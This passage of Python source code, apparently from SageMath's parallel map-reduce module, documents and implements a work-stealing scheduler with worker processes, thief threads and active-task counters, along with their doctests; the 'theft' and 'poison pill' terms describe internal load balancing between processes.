<pstats.Stats instance at 0x7fedea40c6c8>
.. SEEALSO::
`The Python Profilers <https://docs.python.org/2/library/profile.html>`_
for more detail on profiling in python.
.. _logging:
Logging
-------
The computation progress is logged through a :class:`logging.Logger` in
:obj:`sage.parallel.map_reduce.logger` together with :class:`logging.StreamHandler`
and a :class:`logging.Formatter`. They are currently configured to print
warning message on the console.
.. SEEALSO::
`Logging facility for Python <https://docs.python.org/2/library/logging.html>`_
for more detail on logging and log system configuration.
.. note::
Calls to logger which involve printing the node are commented out in the
code, because the printing (to a string) of the node can be very time
consuming depending on the node and it happens before the decision whether
the logger should record the string or drop it.
.. _protocol-description:
How does it work ?
------------------
The scheduling algorithm we use here is any adaptation of :wikipedia:`Work_stealing`:
In a work stealing scheduler, each processor in a computer system has a
queue of work items (computational tasks, threads) to perform. [...]. Each
work items are initially put on the queue of the processor executing the
work item. When a processor runs out of work, it looks at the queues of
other processors and "steals" their work items. In effect, work stealing
distributes the scheduling work over idle processors, and as long as all
processors have work to do, no scheduling overhead occurs.
For communication we use Python's basic :mod:`multiprocessing` module. We
first describe the different actors and communications tools used by the
system. The work is done under the coordination of a **master** object (an
instance of :class:`RESetMapReduce`) by a bunch of **worker** objects
(instances of :class:`RESetMapReduceWorker`).
Each running map reduce instance work on a :class:`RecursivelyEnumeratedSet of
forest type<sage.combinat.backtrack.SearchForest>` called here `C` and is
coordinated by a :class:`RESetMapReduce` object called the **master**. The
master is in charge of lauching the work, gathering the results and cleaning
up at the end of the computation. It doesn't perform any computation
associated to the generation of the element `C` nor the computation of the
mapped function. It however occasionally perform a reduce, but most reducing
is by default done by the workers. Also thanks to the work-stealing algorithm,
the master is only involved in detecting the termination of the computation
but all the load balancing is done at the level of the worker.
Workers are instance of :class:`RESetMapReduceWorker`. They are responsible of
doing the actual computations: elements generation, mapping and reducing. They
are also responsible of the load balancing thanks to work-stealing.
Here is a description of the attribute of the **master** relevant to the
map-reduce protocol:
- ``master._results`` -- a :class:`~multiprocessing.queues.SimpleQueue` where
the master gathers the results sent by the workers.
- ``master._active_tasks`` -- a :class:`~multiprocessing.Semaphore` recording
the number of active task. The work is done when it gets to 0.
- ``master._done`` -- a :class:`~multiprocessing.Lock` which ensures that
shutdown is done only once.
- ``master._aborted`` -- a :func:`~multiprocessing.Value` storing a shared
:class:`ctypes.c_bool` which is ``True`` if the computation was aborted before
all the workers ran out of work.
- ``master._workers`` -- a list of :class:`RESetMapReduceWorker` objects. Each worker is
identified by its position in this list.
Each worker is a process (:class:`RESetMapReduceWorker` inherits from
:class:`~multiprocessing.Process`) which contains:
- ``worker._iproc`` -- the identifier of the worker that is its position in the
master's list of workers
- ``worker._todo`` -- a :class:`collections.deque` storing of nodes of the
worker. It is used as a stack by the worker. Thiefs steal from the bottom of
this queue.
- ``worker._request`` -- a :class:`~multiprocessing.queues.SimpleQueue` storing
steal request submitted to ``worker``.
- ``worker._read_task``, ``worker._write_task`` -- a
:class:`~multiprocessing.queues.Pipe` used to transfert node during steal.
- ``worker._thief`` -- a :class:`~threading.Thread` which is in charge of stealing from
``worker._todo``.
Here is a schematic of the architecture:
.. _figure-map_reduce_arch:
.. figure:: ../../media/map_reduce_arch.png
How thefts are performed
------------------------
During normal time, that is when all worker are active) a worker ``W`` is
iterating though a loop inside
:meth:`RESetMapReduceWorker.walk_branch_locally`. Work nodes are taken from
and new nodes ``W._todo`` are appended to ``W._todo``. When a worker ``W`` is
running out of work, that is ``worker._todo`` is empty, then it tries to steal
some work (ie: a node) from another worker. This is performed in the
:meth:`RESetMapReduceWorker.steal` method.
From the point of view of ``W`` here is what happens:
- ``W`` signals to the master that it is idle :meth:`master._signal_task_done`;
- ``W`` chooses a victim ``V`` at random;
- ``W`` sends a request to ``V`` : it puts its identifier into ``V._request``;
- ``W`` tries to read a node from ``W._read_task``. Then three things may happen:
+ a proper node is read. Then the theft was a success and ``W`` starts
working locally on the received node.
+ ``None`` is received. This means that ``V`` was idle. Then ``W`` tries
another victim.
+ ``AbortError`` is received. This means either that the computation was
aborted or that it simply succeded and that no more work is required by
``W``. Therefore an ``AbortError`` exception is raised leading to ``W`` to
shutdown.
We now describe the protocol on the victims side. Each worker process contains
a :class:`Thread` which we call ``T`` for thief which acts like some kinds of
Troyan horse during theft. It is normally blocked waiting for a steal request.
From the point of view of ``V`` and ``T``, here is what happens:
- during normal time ``T`` is blocked waiting on ``V._request``;
- upon steal request, ``T`` wakes up receiving the identification of ``W``;
- ``T`` signal to the master that a new task is starting by
:meth:`master._signal_task_start`;
- Two things may happen depending if the queue ``V._todo`` is empty or not.
Remark that due to the GIL, there is no parallel execution between the
victim ``V`` and its thief tread ``T``.
+ If ``V._todo`` is empty, then ``None`` is answered on
``W._write_task``. The task is immediately signaled to end the master
through :meth:`master._signal_task_done`.
+ Otherwise, a node is removed from the bottom of ``V._todo``. The node is
sent to ``W`` on ``W._write_task``. The task will be ended by ``W``, that
is when finished working on the subtree rooted at the node, ``W`` will
call :meth:`master._signal_task_done`.
The end of the computation
--------------------------
To detect when a computation is finished, we keep a synchronized integer which
count the number of active task. This is essentially a semaphore but semaphore
are broken on Darwin's OSes so we ship two implementations depending on the os
(see :class:`ActiveTaskCounter` and :class:`ActiveTaskCounterDarwin` and note
below).
When a worker finishes working on a task, it calls
:meth:`master._signal_task_done`. This decrease the task counter
``master._active_tasks``. When it reaches 0, it means that there are no more
nodes: the work is done. The worker executes :meth:`master._shutdown` which
sends ``AbortError`` on all :meth:`worker._request` and
:meth:`worker._write_task` Queues. Each worker or thief thread receiving such
a message raise the corresponding exception, stopping therefore its work. A
lock called ``master._done`` ensures that shutdown is only done once.
Finally, it is also possible to interrupt the computation before its ends
calling :meth:`master.abort()`. This is done by putting
``master._active_tasks`` to 0 and calling :meth:`master._shutdown`.
.. warning:: The MacOSX Semaphore bug
Darwin's OSes do not correctly implement POSIX's semaphore semantic.
Indeed, on this system, acquire may fail and return False not only because
the semaphore is equal to zero but also **because someone else is trying to
acquire** at the same time. This renders the usage of Semaphore impossible
on MacOSX so that on this system we use a synchronized integer.
.. _examples:
Are there examples of classes ?
-------------------------------
Yes ! Here, there are:
- :class:`RESetMPExample` -- a simple basic example
- :class:`RESetParallelIterator` -- a more advanced example using non standard
communication configuration.
Tests
-----
Generating series for sum of strictly decreasing list of integer smaller than
15::
sage: y = polygen(ZZ, 'y')
sage: R = RESetMapReduce(
....: roots = [([], 0, 0)] +[([i], i, i) for i in range(1,15)],
....: children = lambda list_sum_last:
....: [(list_sum_last[0] + [i], list_sum_last[1] + i, i) for i in range(1, list_sum_last[2])],
....: map_function = lambda li_sum_dummy: y**li_sum_dummy[1])
sage: sg = R.run()
sage: bool(sg == expand(prod((1+y^i) for i in range(1,15))))
True
Classes and methods
-------------------
"""
from __future__ import print_function, absolute_import
from multiprocessing import Process, Value, Semaphore, Lock
from multiprocessing.queues import Pipe, Queue, SimpleQueue
from multiprocessing.sharedctypes import RawArray
from threading import Thread
from six.moves import queue
from sage.sets.recursively_enumerated_set import RecursivelyEnumeratedSet # _generic
from sage.misc.lazy_attribute import lazy_attribute
import collections
import copy
import os
import sys
import random
import ctypes
import logging
logger = logging.getLogger(__name__)
logger.__doc__ = """
A logger for :mod:`sage.parallel.map_reduce`
.. SEEALSO::
`Logging facility for Python <https://docs.python.org/2/library/logging.html>`_
for more detail on logging and log system configuration.
"""
logger.setLevel(logging.WARN)
#logger.setLevel(logging.INFO)
#logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'[%(processName)s-%(threadName)s] (%(asctime)s.%(msecs)03.f) %(message)s',
datefmt='%H:%M:%S')
ch.setFormatter(formatter)
logger.addHandler(ch)
def proc_number(max_proc=None):
r"""
Return the number of processes to use
INPUT:
- ``max_proc`` -- an upper bound on the number of processes or
``None``.
EXAMPLES::
sage: from sage.parallel.map_reduce import proc_number
sage: proc_number() # random
8
sage: proc_number(max_proc=1)
1
sage: proc_number(max_proc=2) in (1, 2)
True
"""
from sage.parallel.ncpus import ncpus
n = ncpus()
if max_proc is None:
return n
else:
return min(max_proc, n)
class AbortError(Exception):
r"""
Exception for aborting parallel computations
This is used both as exception or as abort message
TESTS::
sage: from sage.parallel.map_reduce import AbortError
sage: raise AbortError
Traceback (most recent call last):
...
AbortError
"""
pass
class ActiveTaskCounterDarwin(object):
r"""
Handling the number of Active Tasks
A class for handling the number of active task in distributed computation
process. This is essentially a semaphore, but Darwin's OSes do not
correctly implement POSIX's semaphore semantic. So we use a shared integer
with a lock.
"""
def __init__(self, task_number):
r"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: t = ATC(4)
sage: TestSuite(t).run(skip="_test_pickling", verbose=True)
running ._test_new() . . . pass
"""
self._active_tasks = Value(ctypes.c_int, task_number)
self._lock = Lock()
def __repr__(self):
"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: ATC(4)
ActiveTaskCounter(value=4)
"""
return "ActiveTaskCounter(value=%s)"%(self._active_tasks.value)
def task_start(self):
r"""
Increment the task counter by one.
OUTPUT:
Calling :meth:`task_start` on a zero or negative counter returns 0,
otherwise increment the counter and returns its value after the
incrementation.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_start()
5
sage: c
ActiveTaskCounter(value=5)
Calling :meth:`task_start` on a zero counter does nothing::
sage: c = ATC(0)
sage: c.task_start()
0
sage: c
ActiveTaskCounter(value=0)
"""
logger.debug("_signal_task_start called")
with self._lock:
# The following test is not necessary but is allows active thieves to
# stop before receiving the poison pill.
if self._active_tasks.value <= 0:
return 0
self._active_tasks.value += 1
return self._active_tasks.value
def task_done(self):
r"""
Decrement the task counter by one.
OUTPUT:
Calling :meth:`task_done` decrement the counter and returns its value
after the decrementation.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_done()
3
sage: c
ActiveTaskCounter(value=3)
sage: c = ATC(0)
sage: c.task_done()
-1
"""
logger.debug("_signal_task_done called")
with self._lock:
self._active_tasks.value -= 1
return self._active_tasks.value
def abort(self):
r"""
Set the task counter to 0.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.abort()
sage: c
ActiveTaskCounter(value=0)
"""
with self._lock:
self._active_tasks.value = 0
class ActiveTaskCounterPosix(object):
r"""
Handling the number of Active Tasks
A class for handling the number of active task in distributed computation
process. This is the standard implementation on POSIX compliant OSes. We
essentially wrap a semaphore.
.. note::
A legitimate question is whether there is a need in keeping the two
implementations. I ran the following experiment on my machine::
S = RecursivelyEnumeratedSet( [[]],
lambda l: ([l[:i] + [len(l)] + l[i:] for i in range(len(l)+1)]
if len(l) < NNN else []),
structure='forest', enumeration='depth')
%time sp = S.map_reduce(lambda z: x**len(z)); sp
For NNN = 10, averaging a dozen of runs, I got:
- Posix complient implementation : 17.04 s
- Darwin's implementation : 18.26 s
So there is a non negligible overhead. It will probably be worth if we
tries to Cythonize the code. So I'm keeping both implementation.
"""
def __init__(self, task_number):
r"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: t = ATC(4)
sage: TestSuite(t).run(skip="_test_pickling", verbose=True)
running ._test_new() . . . pass
"""
self._active_tasks = Semaphore(task_number)
def __repr__(self):
"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: ATC(4)
ActiveTaskCounter(value=4)
"""
return "ActiveTaskCounter(value=%s)"%(self._active_tasks.get_value())
def task_start(self):
r"""
Increment the task counter by one.
OUTPUT:
Calling :meth:`task_start` on a zero or negative counter returns 0,
otherwise increment the counter and returns its value after the
incrementation.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_start()
5
sage: c
ActiveTaskCounter(value=5)
Calling :meth:`task_start` on a zero counter does nothing::
sage: c = ATC(0)
sage: c.task_start()
0
sage: c
ActiveTaskCounter(value=0)
"""
logger.debug("_signal_task_start called")
# The following test is not necessary but is allows active thieves to
# stop before receiving the poison pill.
if self._active_tasks._semlock._is_zero():
return 0
self._active_tasks.release()
return self._active_tasks.get_value()
task_start.__doc__ = ActiveTaskCounterDarwin.task_start.__doc__
def task_done(self):
r"""
Decrement the task counter by one.
OUTPUT:
Calling :meth:`task_done` decrement the counter and returns its value
after the decrementation.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_done()
3
sage: c
ActiveTaskCounter(value=3)
sage: c = ATC(0)
sage: c.task_done()
-1
"""
logger.debug("_signal_task_done called")
# We tests if the semaphore counting the number of active tasks is
# becoming negative. This should not happen in normal
# computations. However, in case of abort, we artificially put the
# semaphore to 0 to stop the computation so it is needed.
if not self._active_tasks.acquire(False):
return -1
return self._active_tasks.get_value()
def abort(self):
r"""
Set the task counter to 0.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.abort()
sage: c
ActiveTaskCounter(value=0)
"""
while self._active_tasks.acquire(False):
pass
ActiveTaskCounter = (ActiveTaskCounterDarwin if sys.platform == 'darwin'
else ActiveTaskCounterPosix)
# ActiveTaskCounter = ActiveTaskCounterDarwin # to debug DARWIN's implem
class RESetMapReduce(object):
r"""
Map-Reduce on recursively enumerated sets
INPUT:
Description of the set:
- either ``forest=f`` -- where ``f`` is a
:class:`RecursivelyEnumeratedSet of forest type<sage.combinat.backtrack.SearchForest>`
- or a triple ``roots, children, post_process`` as follows
- ``roots=r`` -- The root of the enumeration
- ``children=c`` -- a function iterating through children node, given a parent nodes
- ``post_process=p`` -- a post processing function
The option ``post_process`` allows for customizing the nodes that
are actually produced. Furthermore, if ``post_process(x)`` returns ``None``,
then ``x`` won't be output at all.
Description of the map/reduce operation:
- ``map_function=f`` -- (default to ``None``)
- ``reduce_function=red`` -- (default to ``None``)
- ``reduce_init=init`` -- (default to ``None``)
.. SEEALSO::
:mod:`the Map/Reduce module <sage.parallel.map_reduce>` for
details and examples.
"""
def __init__(self, roots = None,
children = None,
post_process = None,
map_function = None,
reduce_function = None,
reduce_init = None,
forest = None):
r"""
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: R = RESetMapReduce( [[]], lambda : [[]])
sage: R
<sage.parallel.map_reduce.RESetMapReduce object at 0x...>
To silence the coverage checker::
sage: TestSuite(R).run(skip=['_test_pickling'])
"""
if forest is not None:
if not all(x is None for x in (roots, children, post_process)):
raise ValueError("forest arg is incompatible with roots, children and post_process")
self._forest = forest
self._roots = forest._roots
self.children = forest.children
if hasattr(forest, 'post_process'):
self.post_process = forest.post_process
else:
if roots is not None: self._roots = roots
if children is not None: self.children = children
if post_process is not None: self.post_process = post_process
if map_function is not None: self.map_function = map_function
if reduce_function is not None: self.reduce_function = reduce_function
if reduce_init is not None: self._reduce_init = reduce_init
self._profile = None
@lazy_attribute
def _forest(self):
r"""
The forest underlying the map-reduce computation
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample()
sage: f = EX._forest; f
An enumerated set with a forest structure
sage: f.an_element()
[]
"""
return RecursivelyEnumeratedSet(
self.roots(),
self.children,
post_process=self.post_process,
structure='forest', enumeration='depth')
def roots(self):
r"""
Return the roots of ``self``
OUTPUT:
an iterable of nodes
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(42)
sage: S.roots()
42
"""
return self._roots
def map_function(self, o):
r"""
Return the function mapped by ``self``
INPUT:
- ``o`` -- a node
OUTPUT:
By default ``1``.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.map_function(7)
1
sage: S = RESetMapReduce(map_function = lambda x: 3*x + 5)
sage: S.map_function(7)
26
"""
return 1
def reduce_function(self, a, b):
r"""
Return the reducer function for ``self``
INPUT:
- ``a``, ``b`` -- two value to be reduced
OUTPUT:
by default the sum of ``a`` and ``b``.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.reduce_function(4, 3)
7
sage: S = RESetMapReduce(reduce_function=lambda x,y: x*y)
sage: S.reduce_function(4, 3)
12
"""
return a+b
def post_process(self, a):
r"""
Return the post-processing function for ``self``
INPUT: ``a`` -- a node
By default, returns ``a`` itself
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.post_process(4)
4
sage: S = RESetMapReduce(post_process=lambda x: x*x)
sage: S.post_process(4)
16
"""
return a
_reduce_init = 0
def reduce_init(self):
r"""
Return the initial element for a reduction
.. note:: This should be overloaded in applications.
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.reduce_init()
0
sage: S = RESetMapReduce(reduce_init = 2)
sage: S.reduce_init()
2
"""
return copy.copy(self._reduce_init)
def setup_workers(self, max_proc=None, reduce_locally=True):
r"""
Setup the communication channels
INPUT:
- ``max_proc`` -- (integer) an upper bound on the number of
worker processes.
- ``reduce_locally`` -- whether the workers should reduce locally
their work or sends results to the master as soon as possible.
See :class:`RESetMapReduceWorker` for details.
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.setup_workers(2)
sage: S._results
<multiprocessing.queues.Queue object at 0x...>
sage: len(S._workers)
2
"""
self._nprocess = proc_number(max_proc)
self._results = Queue()
self._active_tasks = ActiveTaskCounter(self._nprocess)
self._done = Lock()
self._aborted = Value(ctypes.c_bool, False)
sys.stdout.flush()
sys.stderr.flush()
self._workers = [RESetMapReduceWorker(self, i, reduce_locally)
for i in range(self._nprocess)]
def start_workers(self):
r"""
Lauch the workers
The worker should have been created using :meth:`setup_workers`.
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(roots=[])
sage: S.setup_workers(2)
sage: S.start_workers()
sage: all(w.is_alive() for w in S._workers)
True
sage: sleep(1)
sage: all(not w.is_alive() for w in S._workers)
True
Cleanups::
sage: S.finish()
"""
if self._nprocess == 0:
raise ValueError("No process connected")
logger.info("Starting work with %s processes", self._nprocess)
logger.debug("Distributing tasks")
for i, task in enumerate(self.roots()):
self._workers[i % len(self._workers)]._todo.append(task)
logger.debug("Starting processes")
sys.stdout.flush()
sys.stderr.flush()
for w in self._workers: w.start()
def get_results(self, timeout=None):
r"""
Get the results from the queue
OUTPUT:
the reduction of the results of all the workers, that is the result of
the map/reduce computation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.setup_workers(2)
sage: for v in [1, 2, None, 3, None]: S._results.put(v)
sage: S.get_results()
6
Cleanups::
sage: del S._results, S._active_tasks, S._done, S._workers
"""
res = self.reduce_init()
active_proc = self._nprocess
while active_proc > 0:
try:
logger.debug('Waiting on results; active_proc: %s, '
'timeout: %s, aborted: %s' %
(active_proc, timeout, self._aborted.value))
newres = self._results.get(timeout=timeout)
except queue.Empty:
logger.debug('Timed out waiting for results; aborting')
# If we timed out here then the abort timer should have
# already fired, but just in case it didn't (or is in
# progress) wait for it to finish
self._timer.join()
return
if newres is not None:
logger.debug("Got one result")
res = self.reduce_function(res, newres)
else:
active_proc -= 1
return res
def finish(self):
r"""
Destroys the worker and all the communication objects.
Also gathers the communication statistics before destroying the workers.
TESTS::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: S = RESetMPExample(maxl=5)
sage: S.setup_workers(2) # indirect doctest
sage: S._workers[0]._todo.append([])
sage: for w in S._workers: w.start()
sage: _ = S.get_results()
sage: S._shutdown()
sage: S.print_communication_statistics()
Traceback (most recent call last):
...
AttributeError: 'RESetMPExample' object has no attribute '_stats'
sage: S.finish()
sage: S.print_communication_statistics()
#proc: ...
...
sage: _ = S.run() # Cleanup
.. SEEALSO:: :meth:`print_communication_statistics`
"""
if not self._aborted.value:
logger.debug("Joining worker processes...")
for worker in self._workers:
logger.debug("Joining %s"%worker.name)
worker.join()
logger.debug("Joining done")
else:
logger.debug("Killing worker processes...")
for worker in self._workers:
logger.debug("Terminating %s"%worker.name)
worker.terminate()
logger.debug("Killing done")
del self._results, self._active_tasks, self._done
self._get_stats()
del self._workers
def abort(self):
r"""
Abort the current parallel computation
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 17 else [])
sage: it = iter(S)
sage: next(it) # random
[]
sage: S.abort()
sage: hasattr(S, 'work_queue')
False
Cleanups::
sage: S.finish()
"""
logger.info("Abort called")
self._aborted.value = True
self._active_tasks.abort()
self._shutdown()
def _shutdown(self):
r"""
Called to shutdown the workers
Sends a poison pill to all workers and their thief thread.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 20 else [])
sage: S.setup_workers(2)
sage: for w in S._workers: w.start()
sage: S._shutdown()
Cleanups::
sage: S.finish()
"""
if self._done.acquire(False):
logger.debug("***************** FINISHED ******************")
logger.debug("Sending poison pills")
for worker in self._workers:
worker._request.put(AbortError)
for worker in self._workers:
worker._write_task.send(AbortError)
def _signal_task_start(self):
r"""
Signal a starting task
Used by the worker to signal that a new task is starting. As soon as
there are no more active task, the work is done, in which case an
:exc:`AbortError` is raised.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 20 else [])
sage: S.setup_workers(2)
sage: S._active_tasks
ActiveTaskCounter(value=2)
sage: S._signal_task_start()
sage: S._active_tasks
ActiveTaskCounter(value=3)
Signaling one time too many raise a ``AbortError``::
sage: S._signal_task_done()
sage: S._signal_task_done()
sage: S._signal_task_done()
Traceback (most recent call last):
...
AbortError
"""
if self._active_tasks.task_start() == 0:
raise AbortError
def _signal_task_done(self):
r"""
Signal a done task
Used by the worker to signal that a task is done. As soon as
there are no more active task, the work is done, in which case an
:exc:`AbortError` is raised.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 20 else [])
sage: S.setup_workers(2)
sage: S._active_tasks
ActiveTaskCounter(value=2)
sage: S._signal_task_done()
sage: S._active_tasks
ActiveTaskCounter(value=1)
sage: S._signal_task_done()
Traceback (most recent call last):
...
AbortError
Cleanups::
sage: del S._results, S._active_tasks, S._done, S._workers
"""
# We tests if the semaphore counting the number of active tasks is
# becoming negative. This should not happen in normal
# computations. However, in case of abort, we artificially put the
# semaphore to 0 to stop the computation so that it is needed.
if self._active_tasks.task_done() <= 0:
logger.debug("raising AbortError")
self._shutdown()
raise AbortError
def random_worker(self):
r"""
Returns a random workers
OUTPUT:
A worker for ``self`` chosen at random
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: from threading import Thread
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(2)
sage: EX.random_worker()
<RESetMapReduceWorker(RESetMapReduceWorker-..., initial)>
sage: EX.random_worker() in EX._workers
True
Cleanups::
sage: del EX._results, EX._active_tasks, EX._done, EX._workers
"""
victim = random.randint(0, len(self._workers)-1)
return self._workers[victim]
def run(self,
max_proc=None,
reduce_locally=True,
timeout=None,
profile=None):
r"""
Run the computations
INPUT:
- ``max_proc`` -- (integer, default: ``None``) if given, the
maximum number of worker processors to use. The actual number
is also bounded by the value of the environment variable
``SAGE_NUM_THREADS`` (the number of cores by default).
- ``reduce_locally`` -- See :class:`RESetMapReduceWorker` (default: ``True``)
- ``timeout`` -- a timeout on the computation (default: ``None``)
- ``profile`` -- directory/filename prefix for profiling, or ``None``
for no profiling (default: ``None``)
OUTPUT:
the result of the map/reduce computation or an exception
:exc:`AbortError` if the computation was interrupted or timeout.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample(maxl = 8)
sage: EX.run()
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
Here is an example or how to deal with timeout::
sage: from sage.parallel.map_reduce import AbortError
sage: EX = RESetMPExample(maxl = 100)
sage: try:
....: res = EX.run(timeout=0.01)
....: except AbortError:
....: print("Computation timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation timeout
The following should not timeout even on a very slow machine::
sage: from sage.parallel.map_reduce import AbortError
sage: EX = RESetMPExample(maxl = 8)
sage: try:
....: res = EX.run(timeout=60)
....: except AbortError:
....: print("Computation Timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation normally finished
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
self._profile=profile
self.setup_workers(max_proc, reduce_locally)
self.start_workers()
if timeout is not None:
from threading import Timer
self._timer = Timer(timeout, self.abort)
self._timer.start()
self.result = self.get_results(timeout=timeout)
if timeout is not None:
self._timer.cancel()
logger.info("Returning")
self.finish()
if self._aborted.value:
raise AbortError
else:
return self.result
def _get_stats(self):
r"""
Gather the communication statistics and the end of a run
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: S = RESetMPExample(maxl=6)
sage: S.run() # indirect doctest
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
res = []
for i in range(self._nprocess):
res.append(tuple(self._workers[i]._stats))
self._stats = res
def print_communication_statistics(self, blocksize = 16):
r"""
Print the communication statistics in a nice way
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: S = RESetMPExample(maxl=6)
sage: S.run()
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
sage: S.print_communication_statistics() # random
#proc: 0 1 2 3 4 5 6 7
reqs sent: 5 2 3 11 21 19 1 0
reqs rcvs: 10 10 9 5 1 11 9 2
- thefs: 1 0 0 0 0 0 0 0
+ thefs: 0 0 1 0 0 0 0 0
"""
res = [""] # classical trick to have a local variable shared with the
# local function (see e.g:
# http://stackoverflow.com/questions/2609518/python-nested-function-scopes).
def pstat(name, start, end, ist):
res[0] += "\n" + name
res[0] += " ".join(
"%4i"%(self._stats[i][ist]) for i in range(start, end))
for start in range(0, self._nprocess, blocksize):
end = min(start+blocksize, self._nprocess)
res[0] = "#proc: "+" ".join("%4i"%(i) for i in range(start, end))
pstat("reqs sent: ", start, end, 0)
pstat("reqs rcvs: ", start, end, 1)
pstat("- thefs: ", start, end, 2)
pstat("+ thefs: ", start, end, 3)
print(res[0])
def run_serial(self):
r"""
Serial run of the computation (mostly for tests)
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample(maxl = 4)
sage: EX.run_serial()
24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
import functools
return functools.reduce(self.reduce_function,
(self.map_function(x) for x in self._forest),
self.reduce_init())
class RESetMapReduceWorker(Process):
"""
Worker for generate-map-reduce
This shouldn't be called directly, but instead created by
:meth:`RESetMapReduce.setup_workers`.
INPUT:
- ``mapred`` -- the instance of :class:`RESetMapReduce` for which
this process is working.
- ``iproc`` -- the id of this worker.
- ``reduce_locally`` -- when reducing the results. Three possible values
are supported:
* ``True`` -- means the reducing work is done all locally, the result is
only sent back at the end of the work. This ensure the lowest level of
communication.
* ``False`` -- results are sent back after each finished branches, when
the process is asking for more work.
"""
def __init__(self, mapred, iproc, reduce_locally):
r"""
TESTS::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample()
sage: RESetMapReduceWorker(EX, 200, True)
<RESetMapReduceWorker(RESetMapReduceWorker-..., initial)>
"""
Process.__init__(self)
self._iproc = iproc
self._todo = collections.deque()
self._request = SimpleQueue() # Faster than Queue
# currently this is not possible to have to simultaneous read or write
# on the following Pipe. So there is no need to have a queue.
self._read_task, self._write_task = Pipe(duplex=False)
self._mapred = mapred
self._stats = RawArray('i', 4)
self._reduce_locally = reduce_locally
def _thief(self):
r"""
The thief thread of a worker process
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: from threading import Thread
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(2)
sage: w0, w1 = EX._workers
sage: w0._todo.append(42)
sage: thief0 = Thread(target = w0._thief, name="Thief")
sage: thief0.start()
sage: w1.steal()
42
sage: w0._todo
deque([])
"""
logger.debug("Thief started")
reqs = 0
thefts = 0
try:
for ireq in iter(self._request.get, AbortError):
reqs +=1
target = self._mapred._workers[ireq]
logger.debug("Got a Steal request from %s"%target.name)
self._mapred._signal_task_start()
try:
work = self._todo.popleft()
except IndexError:
target._write_task.send(None)
logger.debug("Failed Steal %s"%target.name)
self._mapred._signal_task_done()
else:
target._write_task.send(work)
logger.debug("Succesful Steal %s"%target.name)
thefts += 1
except AbortError:
logger.debug("Thief aborted")
else:
logger.debug("Thief received poison pill")
if self._mapred._aborted.value: # Computation was aborted
self._todo.clear()
else: # Check that there is no remaining work
